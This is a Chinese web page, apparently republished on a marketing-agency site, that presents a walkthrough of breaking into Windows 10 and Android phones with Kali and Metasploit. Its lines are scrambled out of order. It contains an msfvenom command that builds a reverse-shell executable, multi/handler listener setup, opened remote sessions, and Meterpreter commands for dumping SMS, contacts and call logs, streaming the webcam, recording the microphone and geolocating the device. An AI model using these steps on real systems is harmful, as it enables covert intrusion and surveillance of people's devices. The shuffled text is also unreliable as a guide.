RELATEED CONSULTING
相关咨询
选择下列产品马上在线沟通
服务时间:9:30-18:00
你可能遇到了下面的问题
关闭右侧工具栏

技术支持

谷歌推广 > 技术支持 > 推广优化 >

kali2.0下入侵windows 10和android手机实战

  • 作者:谷歌推广
  • 发表时间:2020-08-17 09:35
  • 来源:迅龙网络

Android Commands

webcam_list List webcams

Command Description

bgkill Kills a background meterpreter script

[*] Streaming…

C:\Users\�ѿ�\Desktop\projects>

[*] Starting the payload handler…

meterpreter > sessions -I

dump_calllog Get call log

Stdapi: Networking Commands

LHOST yes The listen address

meterpreter > check_root

set LPORT 3333

EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)

[*] Starting the payload handler…

set payload windows/x64/shell/reverse_tcp

============================

set LHOST 172.19.40.110

use exploit/multi/handler

disable_unicode_encoding Disables encoding of unicode strings

exploit

send_sms Sends SMS from target session

ipconfig Display interfaces

[*] Meterpreter session 1 opened (172.19.40.110:8888 -> 172.19.0.172:57070) at 2016-06-16 23:11:36 -0400

show options

set_timeouts Set the current session timeout values

execute Execute a command

[*] Started reverse TCP handler on 172.19.40.110:8888

ls List files

Payload options (windows/x64/shell/reverse_tcp):

quit Terminate the meterpreter session

ps List running processes

root@kali:~# msfconsole

interval_collect Manage interval collection capabilities

channel Displays information or control active channels

transport Change the current transport mechanism

Command Description

exploit

route View and modify the routing table

use Deprecated alias for ‘load’

lpwd Print local working directory

[*] Started reverse TCP handler on 172.19.40.110:4444

dir List files (alias for ls)

msf exploit(handler) > set LPORT 8888

—- ————— ——– ———–

[*] Exploit completed, but no session was created.

—- ————— ——– ———–

uuid Get the UUID for the current session

[*] Starting the payload handler…

=======================

dump_sms Get sms messages

set LHOST 192.168.168.111

Command Description

getlwd Print local working directory

[*] Command shell session 1 opened (192.168.168.111:3333 -> 192.168.168.109:3094) at 2016-06-16 20:59:00 -0400

root@kali:~# service postgresql start

dump_contacts Get contacts list

——- ———–

use exploit/multi/handler

webcam_stream Play a video stream from the specified webcam

msf exploit(handler) > exploit

getuid Get the user that the server is running as

portfwd Forward a local port to a remote service

pwd Print working directory

Command Description

[*] Started reverse TCP handler on 192.168.168.111:3333

[*] Sending stage (336 bytes) to 192.168.168.109

Module options (exploit/multi/handler):

[*] Preparing player…

Name Current Setting Required Description

background Backgrounds the current session

cd Change directory

sleep Force Meterpreter to go quiet, then re-establish session.

LPORT 4444 yes The listen port

——- ———–

run Executes a meterpreter script or Post module

cat Read the contents of a file to the screen

download Download a file or directory

(c) 2015 Microsoft Corporation����������Ȩ����

Core Commands

================

===========================

sysinfo Gets information about the remote system, such as OS

wlan_geolocate Get current lat-long using WLAN information

Microsoft Windows [�汾 10.0.10586]

machine_id Get the MSF ID of the machine attached to the session

Stdapi: File system Commands

Command Description

webcam_snap Take a snapshot from the specified webcam

upload Upload a file or directory

——- ———–

——- ———–

Name Current Setting Required Description

lcd Change local working directory

help Help menu

record_mic Record audio from the default microphone for X seconds

bgrun Executes a meterpreter script as a background thread

load Load one or more meterpreter extensions

read Reads data from a channel

getwd Print working directory

LPORT => 8888

^C[-] Exploit failed: Interrupt

Stdapi: Webcam Commands

get_timeouts Get the current session timeout values

[*] Opening player at: kxQmnwHE.html

meterpreter > webcam_stream

rm Delete the specified file

webcam_chat Start a video chat

set PAYLOAD android/meterpreter/reverse_tcp

kali2.0入侵android手机实战

mkdir Make directory

——- ———–

write Writes data to a channel

msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUNC=thread -b ‘\x00’ -f exe-only -o /root/Desktop/shell1.exe

[*] Sending stage (60790 bytes) to 172.19.0.172

search Search for files

show options

geolocate Get current lat-long using geolocation

edit Edit a file

info Displays information about a Post module

[*] Device is not rooted

=============

enable_unicode_encoding Enables encoding of unicode strings

——- ———–

check_root Check if device is rooted

resource Run the commands stored in a file

Stdapi: System Commands

Command Description

shell Drop into a system command shell

=======================

[*] Starting…

irb Drop into irb scripting mode

meterpreter > help

close Closes a channel

bglist Lists running background scripts

rmdir Remove directory

? Help menu

ifconfig Display interfaces

exit Terminate the meterpreter session

上一篇:Google的减法 下一篇:中国“彩绘丝路”考察团与西班牙艺术家座谈交